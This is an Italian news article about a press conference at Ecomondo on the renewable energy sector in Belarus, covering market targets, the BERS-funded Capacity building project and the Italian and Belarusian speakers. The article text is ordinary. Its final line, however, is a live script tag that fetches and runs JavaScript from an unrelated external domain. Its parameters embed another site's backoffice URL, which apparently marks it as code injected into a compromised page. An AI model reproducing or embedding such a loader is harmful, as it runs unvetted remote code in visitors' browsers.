Nonsoloambiente.it – magazine online dedicato all’informazione ambientale – ha organizzato a Ecomondo un incontro dedicato al settore delle energie rinnovabili in Bielorussia. La conferenza stampa, in programma per lo scorso mercoledì 6 novembre alle ore 14.30 presso la Sala Rossa – Hall Sud (Ecomondo – Rimini Fiera), è stata realizzata in collaborazione con BREA (Belarusian Renewable Energy Association), l’associazione di riferimento sul territorio bielorusso.
La conferenza stampa è stata innanzitutto l’occasione per fare il punto sullo stato di diffusione delle energie rinnovabili in Bielorussia e per presentare i principali indicatori del settore: negli ultimi anni, questo mercato ha segnato una crescita considerevole, grazie anche alla progressiva semplificazione degli iter autorizzativi e alla politica di incentivi. In particolare, secondo i dati riportati dall’Energy Charter Secretariat, la Bielorussia offre un significativo potenziale di crescita per le biomasse agricole e forestali – attualmente già in fase di forte sviluppo - e un discreto potenziale nei settori idroelettrico, eolico e solare, che sono, invece, ancora poco diffusi.
Il programma governativo di sviluppo per i prossimi anni è ambizioso: l’obiettivo è quello di passare dall’attuale quota di energia domestica e rinnovabile del 20-21% ad una percentuale del 28-30% entro il 2015 e del 32-34% entro il 2020. Per consentire questa espansione sono ovviamente necessari grandi investimenti: al momento in Bielorussa sono già attive molte aziende straniere - in particolare tedesche e russe - ma gli spazi per nuovi progetti e investitori sono in costante crescita.
In occasione dell’evento del 6 novembre, si ha avuto modo di parlare in particolare del progetto Capacity building, promosso da BREA e realizzato in collaborazione con MWH, società multinazionale di consulenza e ingegneria ambientale. L’obiettivo di questo progetto - finanziato dal Governo Italiano attraverso il Fondo dell’Iniziativa Centro Europea presso la BERS - Banca Europea per la Ricostruzione e lo Sviluppo e avviato dalla stessa BERS – è quello di dare impulso al settore e attirare gli investimenti di capitali esteri.
La conferenza stampa – moderata dal Direttore Editoriale di Nonsoloambiente.it Maria Grazia Persico – ha avuto una caratura internazionale e visto la partecipazione di Vladimir Nistiuk, Presidente di BREA (Associazione Bielorussa produttori di energia da fonti rinnovabili), di Vladimir Kouzmitch, Managing Partner di ENECA (Società bielorussa associata a BREA) e di Elisabetta Dovier, Senior Executive Officer del Fondo dell’Iniziativa Centro Europea (InCE) presso la BERS. Camilla Spinazzi – Energy Project Engineer di MWH – è stata presente per illustrare il progetto Capacity building, mentre Giorgio Simbolotti - Responsabile Strategie e Progetti Dipartimento Energie Rinnovabili - ENEA – ha offerto una panoramica sulle prospettive del mercato energetico bielorusso e delle FER in particolare. Questo spazio informativo è stato condiviso anche con le associazioni di categoria italiane, con gli interventi di Giovanni Battista Zorzoli – Portavoce del Coordinamento FREE (Fonti Rinnovabili ed Efficienza Energetica) – e Vito Pignatelli - Presidente ITABIA (Italian Biomass Association).
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.4983111072452121" type="text/javascript"></script>